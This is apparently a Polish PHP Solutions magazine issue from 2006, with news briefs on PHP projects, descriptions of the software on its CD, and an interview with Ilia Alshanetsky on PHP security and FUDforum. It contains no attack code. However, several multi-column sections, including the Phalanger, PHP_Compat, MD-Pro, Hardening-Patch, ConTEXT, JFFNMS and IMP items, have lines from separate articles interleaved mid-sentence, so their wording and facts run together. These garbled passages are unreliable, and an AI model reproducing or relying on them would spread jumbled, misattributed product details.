za zadanie ułatwić pisanie aplikacji bazodano-
wych i uwolnić programistę od pisania podsta-
wowych funkcjonalności dla każdej tabeli w ba-
zie danych. W chwili obecnej narzędzie generu-
je kod dla PHP i Javy. Na stronie projektu ma-
my możliwość przetestowania narzędzia.
Licencja: BSD
http://titaniclinux.net/daogen/
EZPDO, lekkie ORM dla PHP
EZPDO to narzędzie ORM dla PHP 5 stwo-
rzone w duchu Javowego projektu Hiberna-
te. “EZ” w nazwie oznacza “EASY” -- w odróż-
nieniu od innych pakietów ORM ma być prost-
sze i bardziej przyjazne dla programisty. Narzę-
dzie wprowadza własny język: EZOQL (The mi-
ni object query language), który odpowiednio
rozszerza SQL-owy SELECT. Doskonałą re-
komendacją dla EZPDO może być jego zasto-
sowanie we frameworku PRADO czy Symfo-
ny. Na stronie projektu znajdziemy dobrą do-
kumentację, tutoriale, FAQ oraz forum dysku-
syjne. W najnowszej wersji 1.1.0 zaimplemen-
towano wsparcie dla transakcji i rozszerzono
składnię EZOQL.
Licencja: BSD
http://www.ezpdo.net
eZ Components
Firma eZ systems, znana głównie ze swojego
CMS-a eZ publish, wypuściła pakiet eZ Compo-
nents będący platformą do tworzenia aplikacji
klasy Enterprise. Pakiet składa się z niezależ-
nych bloków, które mają przyspieszyć i ułatwić
tworzenie wysokiej jakości oprogramowania.
Wśród nich znajdują się komponenty do two-
rzenia archiwum, cacheowania, dostępu do ba-
zy danych (opartego na PDO), debugowania,
operowania na plikach graficznych i ich anali-
zy, obsługi poczty elektronicznej, filtrowania da-
nych wejściowych czy komponenty zapewnia-
jące dostęp do danych systemowych takich jak
(RAM, rodzaj CPU itp).
Komponenty wymagają PHP 5.1.
Licencja: New BSD.
http://ez.no/products/ez_components
Moodle – profesjonalny
e-learning za darmo
To najbardziej znany i najlepszy system e-lear-
ningu Open Source stworzony w PHP. Obsłu-
guje aż 73 wersje językowe i zgodny jest z taki-
mi standardami jak SCORM. Kursy dydaktycz-
ne mogą być umieszczane w rozmaity sposób
w różnej formie (pliki mutlimedialne, dokumen-
ty tekstowe w różnych formatach, prezentacje
itd.). System posiada trzy kategorie użytkowni-
ków: admin, nauczyciel i uczeń.
Instalacja systemu jest prawie automatycz-
na. Moodle działa na PHP 4/PHP 5, MySQL/
PostreSQL i Apache/IIS. Dostępnych jest wiele
dodatkowych modułów i pakietów językowych.
Na stronie Moodle'a zarejestrowanych jest po-
nad 70 tyś użytkowników, mówiących w 70 ję-
zykach i pochodzących ze 138 krajów. W su-
mie istnieje prawie 10 tyś stron używających
Moodle'a ze 150 krajów z całego świata (wykaz
znajduje się na stronie domowej projektu), co
stanowi jego najlepszą rekomendację.
Strona projektu zawiera obszerną dokumenta-
cję, FAQ, wersję DEMO oraz statystyki mówią-
ce o tym, jak kształtuje się społeczność uży-
wająca Moodle'a (ok. 40 tyś nowych użytkow-
ników rocznie, a liczba stron używających Mo-
odle'a w ciągu roku wzrosła 5-krotnie, z 2 to 10
tyś). Na stronie znajdziemy też Roadmap z cał-
kiem ambitnymi planami rozbudowy systemu
na najbliższy rok.
http://moodle.org
9
Aktualności

Phalanger, czyli migracja PEAR::PHP_Compat, czyli PHP 5 w PHP 4

z .NET do PHP
Phalanger pozwala na kompilację aplikacji
stworzonej w PHP do .NET, czyli jej urucho-
mienie na platformie ASP.NET. Żeby prze-
D obre rozwiązanie dla tych, którzy z
jakichś powodów nie mogą sobie po-
zwolić na nowe środowisko – PHP 5 na
Compat nie jest zwykłym pakietem PEAR
– nie trzeba go instalować. Wystarczy po-
brać pliki i umieścić je tam, gdzie wskazuje
prowadzić kompilację, będziemy potrzebo-
wali: systemu Windows, frameworka .NET serwerze WWW, a stawiane aplikacje wy- opcja include_path w php.ini. Pakiet rozwi-
w wersji.1.1 i serwera IIS. Phalanger tłu-
maczy kod PHP 5 na język MSIL platfor- magają tej wersji języka. jany jest od połowy 2004 roku. W tym cza-
my .NET i zintegrowany jest z Visual Studio PHP Compat to zbiór funkcji z PHP 5 sie naprawiono kilka błędów i napisano kil-
.NET. Można kompilować PHP-owe aplika-
cje do osobnych programów, jak też do po- napisanych powtórnie specjalnie dla PHP kadziesiąt funkcji.
jedynczych bibliotek. 4. Pakiet jest na bieżąco rozwijany i gdy tyl-
Niedawno ukazała się pierwsza stabilna
ko pojawiają się nowe funkcje w PHP 5, są Licencja: PEAR, PHP License
wersja Phalangera (1.0), która wspiera wie-
le nowych rozszerzeń takich jak ODBC czy tworzone ich odpowiedniki w PHP 4. PHP http://pear.php.net/package/PHP_Compat
WinBinder. Dodano obsługę najnowsze-
go MySQL-a, nowe funkcjonalności z PHP
5.1.2 oraz naprawiono wiele błędów. Na
stronie projektu znajdziemy dokumentację MD-Pro

M
oraz ciekawe i zaskakujące benchmarki (np.
Phalanger/MSSQL kontra PHP/MSSQL lub D-Pro to łatwy w użyciu, administracji i
Phalanger/IIS kontra PHP/IIS). Można też utrzymaniu CMS tworzony przez sku-
zobaczyć przykładowe aplikacje, które zo-
piającą profesjonalistów PHP społeczność
stały przekompilowane do .NET, np.: php-
MyAdmin, phpBB czy PHP-Nuke. Z Road- MaxDev. Jest to system modularny (podob-
mapy projektu można się dowiedzieć o wie- nie jak np. XOOPS, czy Drupal), z możliwo-
lu ciekawych zmianach, które zostaną prze-
prowadzone w kolejnych wersjach aplikacji, ścią rozszerzania instalacji o wybrane z re-
np. wspraciu dla .NET Framework 2.0 pozytorium czy tworzone indywidualnie mo-
i Mono.
http://www.php-compiler.net/ duły. Wśród dostępnych modułów warto
wymienić: e-commerce (sklepy, systemy kami lub bez). Bloki umieszczamy w dzie-
Pakiet łat bezpieczeństwa płatności np. PayPall); zarządzanie pro- więciu różnych pozycjach na stronie i mo-
dla aplikacji PHP jektami, kalendarze, organizatory pracy; żemy swobodnie zmieniać ich szablony.
Hardening-Patch to zestaw łat, który za-
pewnia zwiększone bezpieczeństwo ser- galerie zdjęć, fora, czaty; zaawansowane MD-Pro oferuje też menedżer plików oraz
wera WWW oraz aplikacji pisanych w PHP. systemy menu, statystyki, narzędzia do narzędzia do backupowania i optymaliza-
Pakiet obecnie liczy 16 łat, m.in.: ochro-
na przed uploadowanymi zainfekowanymi zarządzania serwerem; sondy, newslet- cji bazy danych. Do edycji artykułów służy
plikami czy przed atakami HTTP Respon- ter, zdalne nauczanie. RTE Editor. Mamy też wbudowany mecha-
se Splitting.
Deweloperzy projektu świadczą wsparcie,
CMS zapewnia wielojęzyczność, ła- nizm statystyk.
publikują artykuły i organizują audyty bez- twość modyfikacji i dostosowania szablo- MD-Pro jest w 98% kompatybilny
pieczeństwa. Oficjalnie określili wydanie nów oraz pozycjonowanie bloków na stro- z modułami, blokami i szablonami z Po-
PHP Security Consortium Guide mianem
szkodliwej lektury. nie WWW. MD-Pro oferuje póki co wspar- stNuke i eNvolution. Projekt posiada mię-
Licencja: BSD cie dla MySQL-a i Oracle'a. Posiada rozbu- dzynarodowe wsparcie w wielu językach.
http://www.hardened-php.net/
dowany, przejrzysty panel administracyjny Dużym plusem projektu jest obszerna
PEAR::Image_3D z możliwością elastycznego i swobodnego i przejrzysta dokumentacja.
Image_3D to pakiet dla PHP 5 umożliwiają- zarządzania uprawnieniami, grupami i użyt-
cy tworzenie grafiki 3D. Pozwala na tworze-
nie różnych trójwymiarowych obiektów i de- kownikami. Mamy do wyboru cztery różne Licencja: GPL
finiowane własnych. Zapewnia nawet im- typy panelu administracyjnego (np. z grafi- http://www.maxdev.com/
port plików popularnego programu 3DSMax.
Grafiki wyjściowe tworzy za pośrednictwem
GD, SVG lub ASCII. Pakietowi brakuje nie-
stety dokumentacji dla użytkownika, przykła-
dów i tutoriali.
Licencja: LGPL
http://pear.php.net/package/Image_3D

Nitro Web Framework

Nitro to profesjonalny framework wykorzystują-
cy Ruby i Javascript. Oferuje wyjątkowo przej-
rzyste API i mapowanie ORM. Wykorzystu-
je AJAX-a i XML-a. Jednym słowem: RAD (Ra-
pid Application Development) dla programi-
stów PHP.
Licencja: BSD
http://www.nitrohq.com/

phpDataCache
PhpDataCache to biblioteka oferująca proste
API do cachowania danych w zmiennych PHP.
Wspiera wiele różnych DAO (Data Access Ob-
jects) w zależności od zastosowania.
Licencja: LGPL
http://sourceforge.net/projects/phpdatacache/

10 www.phpsolmag.org PHP Solutions Nr 3/2006

Opis CD

ConTEXT Editor

C onTEXT to wielookienkowy edytor

programistyczny, ułatwiający two-
rzenie aplikacji w PHP, Pythonie, Perlu,
Javie, Javascripcie i sporej liczbie innych
języków. Pozwala na zakładanie projek-
tów obejmujących zestaw plików, reje-
strację i uruchamianie makr czy stoso-
wanie szablonów kodu. To ostatnie ro-
bi duże wrażenie: możemy dodawać no-
we i edytować istniejące wzorce (np. kla-
sy czy funkcje), a następnie jednym na-
ciśnięciem CTRL+J wklejać je w dowol-
nym miejscu. Edycję ułatwiają również
zakładki, które umieszczamy w wybra-
nych liniach, a później możemy się do
nich odwoływać.
Bardzo wygodne jest zaznaczanie
dowolnego fragmentu kodu: możemy wy-
brać prostokątny blok np. od dziesiątej do
piętnastej kolumny. Przydatne jest też po-
równywanie zawartości dwóch plików czy
wyszukiwanie i zamiana przy użyciu wy-
rażeń regularnych. ConTEXT pozwa-
la również na przechwytywanie wyników duje się m.in. polska, francuska, niemiec- wanie wart zainteresowania każdego pro-
działania programów uruchamianych w li- ka i włoska. gramisty piszącego w PHP i nie tylko.
nii poleceń. Podsumowując: ConTEXT to darmo-
Interfejs edytora ConTEXT jest wielo- wy produkt porównywalny z niektórymi Licencja: freeware
języczny: wśród dostępnych wersji znaj- rozwiązaniami komercyjnymi, zdecydo- http://www.context.cx

PHP Expert Debugger i PHP Expert Editor

P HP Expert Debugger to darmowe i ła-
twe w użyciu narzędzie służące do
debuggowania skryptów napisanych w
PHP. Program korzysta z DBG PHP De-
bugger firmy Nusphere i pozwala debugo-
wać skrypty zarówno poprzez sieć, jak i na
lokalnych maszynach. Skrypty można uru-
chamiać w trybie krok-po-kroku w celu śle-
dzenia wartości dowolnej zmiennej oraz
wyniku skryptu. Debugger posiada przyja-
zny interfejs, a jego dodatkową zaletą jest
możliwość integracji ze środowiskami pro-
gramistycznymi dla PHP oraz edytorami.
PHP Expert Editor to kolejny przed-
stawiany przez nas edytor dedykowany
PHP. Twórcy przedstawiają go nawet jako
łatwe w użyciu IDE (ang. Integrated Deve-
lopment Environment). Edytor zaprojekto-
wany został z myślą o raczej zaawanso-
wanych programistach PHP, choć posia-
da funkcje przyjazne także początkują-
cym. Wśród wielu funkcjonalności wy-
mienić warto wbudowany serwer HTTP rzone skrypty. Program posiada obowiąz- przeglądarkę tworzonych projektów, prze-
(można używać także zewnętrznych ser- kowe podświetlanie składni, wbudowa- glądarkę bibliotek, system szablonów ko-
werów) oraz Debugger w którym możemy ną przeglądarkę, funkcję przeszukiwania du oraz inne raczej oczywiste funkcje (jak
uruchamiać, testować i debugować two- kodu, wyszukiwania plików, klienta FTP, różne tryby podświetlania).

12 www.phpsolmag.org PHP Solutions Nr 3/2006

 Opis CD

JFFNMS – Just For Fun Network Management System

J FFNMS to rozbudowane narzędzie do

zarządzania i nadzorowania sieci lo-
kalnej, działające w przeglądarce interne-
towej. Pozwala śledzić ruch wchodzący
i wychodzący i sporządzać szczegółowe
raporty i statystyki, obejmujące m.in. licz-
bę przesyłanych bajtów, procent wykorzy-
stania łącza, liczbę pakietów (w tym błęd-
nych) na sekundę, ilość połączeń (również
połączenia odrzucone), komunikację TCP
(połączenia przychodzące, wychodzące,
nawiązane i opóźnione), liczbę użytkow-
ników oraz zużycie pamięci i dysków czy
procesora, jak też działanie oprogramo-
wania serwerowego, np. Apache'a. Może-
my też monitorować zawartość przesyłaną
przez porty TCP.
Program informuje użytkownika o
zdarzeniach zachodzących w sieci (m.in.
przez RSS, e-mail czy RDF), a także po-
zwala eksport zebranych danych do pliku obiektową. Do działania wymaga PHP, rzędzia NET-SNMP, biblioteki Graphviz
CSV czy sporządzanie wykresów na ich Apache'a i bazy danych (MySQL lub i Webfonts czy skaner portów NMAP.
podstawie. PostgreSQL). Jak zapewnia producent, Instalacja pakietu jest prosta i do-
JFFNMS integruje się z popularnymi program powinien działać pod każdym brze opisana. Podsumowując: JFFNMS
narzędziami administratorskimi, takimi jak systemem operacyjnym, dla którego ist- to narzędzie, które przyda się każde-
Smokeping, fping, NMAP, Linux TC, Ta- nieje PHP. mu administratorowi i właścicielowi sie-
tacs, IPTables, NTP czy MSyslog, a tak- (był testowany na Linuksie, FreeBSD ci komputerowej, który chce orientować
że z występującym w każdej dystrybu- i Windows 2000). Oprócz tego, wyma- się w wykorzystaniu swoich zasobów.
cji Linuksa cronem (menedżer planowa- ga Apache'a, bazy danych (MySQL lub
nych zadań). PostgreSQL) oraz narzędzi: RRDtool,
JFFNMS został napisany w PHP NMAP i GNU Diff. Opcjonalnie, przy- Licencja: GNU GPL
(współpracuje z PHP5) i jest aplikacją da się również serwer TFTP i trapd, na- http://www.jffnms.org

Filmy tutorialowe

W poprzednim numerze PHP Solutions

zamieściliśmy na płycie komercyjne
filmy firmy KeyStone Learning. W tym nu-
merze zamieściliśmy kompletne tutoriale
user_login, user_memberlist i user_mem-
berlist2. Są to trzy filmy pokazujące two-
rzenie oprogramowania w PHP (opracowa-
ne zostały na podstawie wersji PHP4) przy
użyciu edytora programistycznego Con-
TEXT. Są całkiem długie (razem ponad go-
dzinę) i wyczerpujące. Na pierwszym z nich
pokazane jest, jak napisać formularz logo-
wania oraz skrypt, który go obsługuje. Dwa
kolejne demonstrują tworzenie aplikacji po-
zwalającej na przeglądanie oraz edycję li-
sty użytkowników. Wszystkie filmiki opatrzo-
ne są narracją, w której programista prowa-
dzi widza krok po kroku przez wszystkie eta-
py tworzenia tych programów. Szczególny
nacisk kładziony jest na pokazanie zagad-
nień związanych z bezpieczeństwem (m.in.
oczyszczanie danych pobieranych z formu- tagów HTML-owych) oraz łączeniem z ba- są ciekawą propozycją, choć raczej dla po-
larza poprzez eskejpowanie czy usuwanie zami danych. Podsumowując: opisane filmy czątkujących programistów.

PHP Solutions Nr 3/2006 www.phpsolmag.org 13

Opis CD

IMP Webmail Client

I MP to program pocztowy działający

w przeglądarce internetowej. Umożli-
wia dostęp do kont IMAP oraz POP3, co
wyróżnia go pozytywnie pośród innych
klientów, których funkcjonalność prze-
ważnie ogranicza się do obsługi kont
IMAP-owych. Należy jednak wspomnieć,
że w obu przypadkach wymaga obsługi
IMAP przez serwer, na którym zainstalo-
wane jest PHP.
Interfejs programu IMP jest przejrzy-
sty i wygodny w obsłudze. Bardzo dobre
wrażenie sprawia edytor typu WYSIWYG
do tworzenia wiadomości. Poza tym, IMP
zapewnia obsługę (w tym przeszukiwanie)
wielu kont mailowych jednocześnie, możli-
wość stosowania kryptografii, poprawiony
w stosunku do wersji poprzedniej support
typów MIME czy elastyczność w wyborze
i zmianie aktualnej strony kodowej. Wiado-
mości są posegregowane na wielopozio-
mowe foldery. Możemy też przeszukiwać frameworka Horde (do którego zresztą bardzo pomocne. Możliwość sprawdzania
zgromadzone listy i zapisywać wyniki po- należy) w wersji 3.0 lub nowszej. Podsu- poczty w dowolnym miejscu (z dostępem
szukiwań do późniejszego wykorzystania. mowując: jeden z lepszych klientów ma- do sieci), na dowolnym komputerze wy-
Projekt dzieli się na dwie gałęzie (obie ilowych; twórcom należy się uznanie za posażonym w przeglądarkę internetową
stabilne) – 4.0 oraz 3.2.8, które minimal- to, że nie zapomnieli o użytkownikach jest często nieoceniona.
nie różnią się pod względem możliwości. kont POP3.
Do działania, IMP wymaga PHP (wersja Warto wiedzieć i pamiętać o istnie- Licencja: GNU GPL
4.3.0), biblioteki UW-IMAP c-client oraz niu tego typu aplikacji, bo mogą one być http://www.horde.org/imp

PHP Solutions Live – opis płyty CD

N a płycie CD ponownie zamieściliśmy

PHP Solutions Live – bootowalną
dystrybucję Linuksa opartą na Aurox Live
11. Bazowa zawartość dystrubucji w zasa-
dzie się nie zmieniła. Stanowi ona komplet-
ną platformę testową, zawierającą PHP5,
bazę danych MySQL, serwer WWW Apa-
che oraz przeglądarkę Firefox. Pozwala
na testowanie i modyfikowanie opisanych
w artykułach aplikacji, a także tworzenie
i korzystanie z własnych skryptów (należy
je umieszczać w katalogu /var/www/html).
Aby uruchomić dystrybucję, nale-
ży wystartować komputer z płyty CD
(może okazać się konieczne ustawienie
w BIOS-ie komputera odpowiedniej
opcji). Po uruchomieniu systemu, uka-
że się okno przeglądarki internetowej,
zawierające menu płyty podzielone na
kategorie. To samo menu dostępne jest
w przypadku korzystania z płyty na za-
instalowanym systemie. Pierwszą z nich
są rozwiązania z artykułów. Ten odno-
śnik działa jednak tylko w systemie Live.
Znajdują się tam rozwiązania z artyku-
łów jak system eyeOS (użytkownik:root;
hasło:admin) oraz Ampache (użytkow-
nik: admin; hasło:admin). Niżej znajdzie-
cie filmy, które można odtwarzać jednym
kliknięciem z poziomu Live.
W następnych pozycjach menu znaj-
dziecie aplikacje, które zmieściły się na
płycie oraz książki w formacie PDF.
PHP Solutions Live pozwala na ko-
rzystanie z dysków twardych (wszyst-
kie partycje są automatycznie mon-
towane podczas startu systemu) oraz
sieci lokalnej i Internetu. Sieć trzeba
najpierw skonfigurować. Możecie to
zrobić na kilka sposobów. Pierwszym
z nich jest użycie działającego w try-
bie graficznym narzędzia (system-ne-
twork-config). Menu systemu dostęp-
ne jest po kliknięciu prawym przyci-
skiem myszki na pulpicie. Drugą meto-
dą jest wywołanie polecenia netconfig
z terminala. Po jego użyciu trzeba zre-
startować sieć poleceniem service ne-
twork restart. Kolejnym sposobem jest
użycie trzech komend linuksowych:
ifconfig urządzenie adres _ IP , route
add default gw adres _ bramki _
internetowej oraz echo "nameserver
adres _ IP" > /etc/resolv.conf.
Życzymy miłej pracy z Livem i cze-
kamy na Wasze sugestie, Redakcja
PHP Solutions.

14 www.phpsolmag.org PHP Solutions Nr 3/2006

 Na CD
Przetestuj aplikacje
bez instalacji!

3 nowe książki elektroniczne

Byte of Python
Version Control with Subversion
Prolog and Natural – Language Analisis HIT
Kursy Video: User Login i User Memberlist – obejrzyj w Live!

Aplikacje
Context Editor – edytor wykorzystany w kursach video Rozwiązania z artykułów w PHP Solutions LiveCD
DzSoft PHP Editor – wydłużony 45 dniowy trial EyeOS
Quick Web Photo Resizer – wydłużony 45 dniowy trial
Ampache
PHP Expert Editor – shareware
PHP Expert debugger – shareware
na naszej stronie internetowej pod adresem www.phpsolmag.org/pl

na naszej stronie internetowej pod adresem www.phpsolmag.org/pl

Wszystkie listingi z artykułów zostały zamieszczone

Wszystkie listingi z artykułów zostały zamieszczone

Wywiad
Wywiad z Ilią Alshanetskym
PHP Solutions: W jaki sposób zaczęła się
Twoja przygoda z PHP, w szczególności z
aspektami bezpieczeństwa?
Ilia Alshanetsky: Używam PHP od
około 8 lat, zaś przez ostatnie 4-5 lat aktyw-
nie współuczestniczę w rozwijaniu tej tech-
nologii. Bezpieczeństwo aplikacji jest jed-
nym z tych aspektów, do których zawsze
przywiązuję dużą wagę przy projektowa-
niu aplikacji. Za każdym razem, kiedy piszę
nowy fragment kodu, staram się myśleć o
konsekwencjach wykorzystania tworzonego
właśnie rozwiązania, głównie w kontekście
bezpieczeństwa. Uważam po prostu, że
bezpieczeństwo aplikacji jest jednym z tych
elementów funkcjonalności, których zwy-
czajnie nie da się dodać później. Od ponad
dwóch lat staram się promować i uspraw-
niać mechanizmy bezpieczeństwa PHP.
PHPS: Jak Twoim zdaniem prezentują
się rozwiązania związane z zapewnieniem
bezpieczeństwa PHP (i aplikacji WWW) w
odniesieniu do takich platform jak Java lub
ASP. Czy w porównaniu z technologią PHP
mechanizmy te wyróżniają się czymś szcze-
gólnym?
Ilia: Moim zdaniem główną siłą języ-
ka PHP jest łatwość jego używania. Inny-
16
Ilia jest głównym architektem oprogramowania
w Advanced Internet Designs Inc, firmie
oferującej wsparcie oraz usługi deweloperskie
dla szerokiej gamy podmiotów, zarówno
komercyjnych jak i rządowych, głównie
w zakresie technologii PHP. Poza
zaangażowaniem w przedsięwzięcia komercyjne,
Ilia uczestniczy też w wielu projektach typu
Open Source. Jest twórcą FUDForum i autorem
książki „PHP Security Guide”. Jako deweloper
bierze udział w rozwijaniu wielu rozszerzeń
języka PHP: między innymi PDO, GD, SQLite.
mi słowy: niemalże każdy po przyswoje-
niu podstawowych informacji, może prak-
tycznie z miejsca zacząć pisać działają-
ce programy w oparciu o PHP. Jednak nie
na tym polega prawdziwa sztuka inżynie-
rii oprogramowania. Chodzi o to, że ludzie
którzy piszą programy, których celem jest
„tylko” działać, często zapominają o innych
ważnych kwestiach. Jedną z takich kwestii
jest właśnie bezpieczeństwo aplikacji. Pro-
gramistom wydaje się zazwyczaj, że PHP
niejako automatycznie rozwiązuje wszyst-
kie związane z tym problemy. Niestety, jak
pewno zdajesz sobie z tego sprawę, osoby
myślące w ten sposób są w dużym błędzie.
W konsekwencji mamy na rynku nawał apli-
kacji zbudowanych przy użyciu PHP, które
pod względem bezpieczeństwa są, delikat-
nie mówiąc, niezadowalające. Na dodatek,
wielu autorów takich aplikacji dokleja skrót
PHP do nazw swoich produktów, po to aby
ludzie kojarzyli je z tą technologią. Przykła-
dy takiego marketingowego zabiegu moż-
na mnożyć: PHPNuke, PHPBB, phpMyAd-
min i tak dalej... Konsekwencje są takie, że
jeśli we wspomnianych produktach znajdo-
wane są dziury, to wiele osób wyrabia so-
bie automatycznie zdanie, że problem le-
www.phpsolmag.org
ży w samym PHP. Problem w tym, że lu-
dzie słabo obeznani z informatyką (a w
szczególności nieobeznani z PHP) nie do
końca rozpoznają różnicę pomiędzy języ-
kiem PHP, a aplikacją pisaną w tym języku.
Za to Ci, którzy te różnicę rozumieją, czę-
sto mimo to wyrabiają sobie mylne zdanie
na zasadzie rozumowania: skoro wszyst-
kie te duże, poważne (i popularne) projekty
mają luki w zabezpieczeniach to musi być
to wina PHP. Przecież autorzy tych projek-
tów nie mogą się wszyscy naraz mylić...
Z technicznego punktu widzenia, PHP nie
jest bardziej czy mniej bezpieczne niż Java
czy .NET. Jednak dziwnym trafem mało kto
zakłada, że Java sama z siebie gwarantuje
bezpieczeństwo tworzonych w niej aplika-
cji. A w przypadku PHP takie założenie jest
niemalże na porządku dziennym.
PHPS: Jesteś autorem książki PHP
Security Guide. Na czym głównie skupiłeś
się przygotowując tę pozycję?
Ilia: Starałem skupić się na najczęściej
wykorzystywanych słabych punktach istnie-
jących w mechanizmach bezpieczeństwa
Internetu, oczywiście ze szczególnym ukie-
runkowaniem na problemy związane z PHP.
Mam tu na myśli takie zjawiska jak ataki
PHP Solutions Nr 3/2006

XSS (ang. Cross Site Scripting), fałszowa-
nie żądań (ang. Request Forgery), wstrzy-
kiwanie kodu SQL (ang. SQL Injection) i tak
dalej. Celem mojej książki było przedstawie-
nie wspomnianych form ataków, wyjaśnie-
nie na czym polegają niebezpieczeństwa z
nimi związane i wreszcie: pokazanie, w jaki
sposób techniki te są w praktyce nadużywa-
ne. Byłbyś prawdopodobnie zdziwiony, gdy-
byś wiedział jak wielu ludzi (zarówno progra-
mistów jak i menedżerów IT) wykazuje na-
gminną i niemalże irracjonalną tendencję do
ignorowania tego typu problemów. Weźmy
na przykład atak XSS: wiele osób argumen-
tuje, że technika ta wymaga specjalnych
technik socjologicznych w celu jej zastoso-
wania i przez to mało kto jej używa. Ponie-
waż tego typu argumenty ocierają się o non-
sens, dlatego w swojej książce dosyć dużo
miejsca poświęciłem na analizę wspomnia-
nych problemów w kontekście praktycznym.
PHPS: Czy mógłbyś powiedzieć coś
na temat projektów, w których aktualnie
bierzesz udział. Które z nich są najbar-
dziej interesujące? I dlaczego?
Ilia: Zasadniczo, niemalże o wszyst-
kich projektach (zarówno tych otwartych jak
i tych komercyjnych) w których biorę (bądź
brałem) udział, mogę powiedzieć, że by-
ły interesujące. Dla przykładu, ostatnio pra-
cuję nad aplikacją, której zadaniem jest au-
tomatyczne wykrywanie słabych punktów
w systemach webowych i przygotowywanie
szczegółowych raportów dla klienta. Projekt
ten jest niezwykle ekscytujący i jednocze-
śnie stanowi duże wyzwanie od strony tech-
nicznej. Poświęcam temu prawie przez ca-
ły swój wolny czas i sądzę, że jeszcze tro-
chę potrwa, zanim dobrnę do końca. Wyda-
je mi się, że w perspektywie ostatniego roku
było to chyba najciekawsze z moich przed-
sięwzięć. Oczywiście w międzyczasie zaj-
muję się też FUDforum, gdzie zawsze sta-
ram się prezentować coś nowego. Można
powiedzieć, że prowadzę wyścig z samym
sobą, starając się ulepszać to, co już robi-
łem wcześniej. To również jest bardzo eks-
cytujące zajęcie, szczególnie kiedy udaje mi
się znaleźć nowe, lepsze rozwiązanie pro-
blemu, który wydawał się być już całkowicie
rozłożony na łopatki.
PHPS: Jakie były początki projektu
FUDforum. Czy był jakiś specjalny powód,
który sprawił, że się tym zająłeś?
Ilia: Często odpowiadam na tego ty-
pu pytania ;-). Można powiedzieć, że pro-
jekt ruszył z dwóch powodów. Po pierwsze,
PHP Solutions Nr 3/2006
potrzebowałem biuletynu informacyjnego o
bardzo dużej przepustowości i żadne z ist-
niejących rozwiązań (zarówno darmowych
jak i komercyjnych) nie odpowiadało moim
potrzebom. Dodatkowo, jedno z wymagań
odnośnie docelowego rozwiązania zakłada-
ło potrzebę ścisłej integracji z NNTP, w ce-
lu uzyskania obustronnej komunikacji po-
między forum a serwerem newsów. Po wy-
konaniu wstępnych badań, które miały okre-
ślić, na ile opłaca się modyfikować istnieją-
ce rozwiązania w celu uzyskania wymaga-
nej wydajności i funkcjonalności, uznałem
że korzystniej będzie zbudować taki system
od podstaw. I tak to się zaczęło...
PHPS: Co Twoim zdaniem jest naj-
ważniejsze w kontekście przyszłości plat-
formy PHP? Jakie zmiany należałoby we-
dług Ciebie wprowadzić tak, aby ulepszyć
język, zwiększyć bezpieczeństwo aplikacji i
sprawić, że PHP będzie częściej używany
do budowania rozwiązań klasy Enterprise?
Ilia: Cóż, wydaje mi się, że powstawa-
nie i rozwój takich firm jak Zend, Omni Ti,
Advanced Internet Designs Inc (to akurat
moja firma) czy eZ Publish, daje bardzo du-
żo w kontekście przydatności PHP przy bu-
dowaniu zaawansowanych rozwiązań biz-
nesowych. W przypadku dużych firm, głów-
nym problemem jest najczęściej brak wspar-
cia dla danej technologii, szczególnie w sytu-
acjach krytycznych. Problem ten dotyka wie-
lu przedsięwzięć typu Open Source. Dewe-
loperska lista dyskusyjna czy też adres ma-
ilowy do autorów, to często zbyt mała gwa-
rancja wsparcia dla dużych organizacji, któ-
re chciałby korzystać z rozwiązań otwartych.
W momencie kiedy pojawiają się firmy ofe-
rujące profesjonalną pomoc w tym zakresie
(w przewidywalnym czasie), sytuacja wy-
gląda zupełnie inaczej. Inna sprawa to kwe-
stia popularności danej technologii. Na przy-
kład PHP jest używane do obsługi serwisu
Yahoo. Fakt ten jest niezwykle istotny, głów-
nie z tego względu, że menadżerowie lubią
weryfikować swoje decyzje na podstawie
decyzji podejmowanych w innych firmach.
Bardzo mało jest odważnych jednostek, któ-
re decydują się wykonać pierwszy krok. Jeśli
chodzi o platformę samą w sobie, to wydaje
mi się, że należy zwiększyć nakład pracy
nad dostarczaniem narzędzi ułatwiających i
wspomagających proces budowania aplika-
cji oraz integrację z najnowszymi technolo-
giami – takimi jak na przykład JSON. Waż-
nym aspektem wydaje się być kwestia inte-
gracji PHP z innymi platformami i językami,
www.phpsolmag.org
Wywiad
takimi jak Java czy .NET. Na szczęście fir-
my takie jak Sun czy Zend pracują aktualnie
nad tymi zagadnieniami, co wróży rychłą po-
prawę aktualnego stanu rzeczy. Jeśli mówi-
my o sprawach powiązanych z bezpieczeń-
stwem to myślę, że warto by popracować
nad usprawnieniem podstawowego pakietu
narzędzi PHP, tak aby pisanie bezpiecznych
aplikacji było łatwiejsze i bardziej naturalne.
Dobry przykład, a jednocześnie zdecydowa-
ny krok w dobrym kierunku w tej dziedzinie
stanowi rozszerzenie PHP udostępniające
mechanizmy filtrowania.
PHPS: Wiele rozwiązań tworzonych
w PHP wzoruje się na istniejących pomy-
słach realizowanych na bazie innych plat-
form, takich jak na przykład Java. Moż-
na by tu wymienić takie projekty jak SDO,
PHPUnit czy iConnect, a także wiele in-
nych. Czy sadzisz, że nadejdzie kiedyś
dzień, kiedy sytuacja się odwróci i progra-
miści Javy będą czerpać pomysły z pro-
jektów opartych na platformie PHP? Czy
myślisz, że jest to w ogóle możliwe?
Ilia: Nie widzę przeszkód – w końcu do-
bre pomysły są w dużej mierze niezależ-
ne od platformy. Prawdę mówiąc widziałem
już kilka rozwiązań budowanych przy uży-
ciu ASP/.NET, lecz opartych – w sensie kon-
cepcyjnym – na projektach PHP. Przykłado-
wo ASPMyAdmin odwzorowuje ideę php-
MyAdmin, tyle że docelowo działa w środo-
wisku Microsoft SQL Server.
PHPS: Jakie są Twoje plany zawodo-
we na najbliższy czas? Zamierzasz rozpo-
czynać jakieś nowe projekty?
Ilia: Jest jedna rzecz, którą chciałbym
się w niedługim czasie zająć. Mam na my-
śli bibliotekę, czy może wręcz rozszerzenie
PHP, pozwalające przekształcać zapytania
użytkownika na format, który byłby łatwy do
zastosowania przy budowaniu zapytań ni-
skopoziomowych. Cała ta sprawa wiąże się
z faktem, że ostatnio spędziłem dużo czasu
na przystosowywaniu PHP do pracy z róż-
nymi ciekawymi silnikami wyszukiwania, na
przykład Xapian. W trakcie pracy okaza-
ło się, że brakuje mi udogodnień wspiera-
jących przekształcanie złożonych zapytań
użytkownika na odpowiadające im zapyta-
nia do bazy danych. Sądzę, że mając wspo-
mniane udogodnienie, można by oszczędzić
sobie bardzo dużo pracy w różnego rodzaju
przedsięwzięciach. n
Wywiad przeprowadził
Dariusz Pawłowski
17
Początki
Co nowego w PHP6?
